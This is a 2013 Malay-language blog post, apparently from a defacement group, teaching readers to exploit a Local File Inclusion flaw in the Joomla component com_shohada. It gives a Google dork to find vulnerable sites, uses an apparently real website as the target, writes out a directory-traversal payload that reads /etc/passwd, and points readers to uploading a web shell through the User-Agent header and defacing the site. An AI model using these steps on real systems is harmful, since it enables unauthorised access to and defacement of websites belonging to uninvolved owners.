Friday, 17 May 2013

Joomla Component com_shohada LFI Vulnerability


Assalamualaikum dan salam sejahtera.Entry hari ini aku nak share exploit joomla component com_shohada. component joomla ini terdedah kepada serangan Local File Inclusion atau LFI.

Ok jom..

1. Mula-mula cari website sasaran dengan google dork.(copy dan paste dekat google).


Dork : inurl:com_shohada


2. Kemudian pilih mana2 website yang korang nak.
Ok aku dah dapat satu website : 

http://gorgab.com/index.php?option=com_shohada&view=shohada

3. Sekarang gantikan url laman web korang tu dengan :

index.php?option=com_shohada&controller=

Jadi website tadi akan jadi :http://gorgab.com/index.php?option=com_shohada&controller=

4. Sekarang masa untuk kita serang guna LFI.
Tempat korang nak serang tu :

http://gorgab.com/index.php?option=com_shohada&controller=[LFI DI SINI]


Kemudian masukkan exploit :
http://gorgab.com/index.php?option=com_shohada&controller=../../../../../../../../../../etc/passwd

Tengok yang BIRU tu exploit LFI.kalau tak jadi, buang dihujung tu.Kalau tak jadi jugak maksudnya web tu tak vulnerable.

Rujuk gambar :


Ni maksudnya website tu vulnerable! Sekarang korang boleh lah upload shell guna User-Agent.

Tutorial upload shell LFI tengok di sini : 
Upload Shell Dan Deface dengan LFI

Ok itu saja Assalamualaikum!

Item Reviewed: Joomla Component com_shohada LFI Vulnerability Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com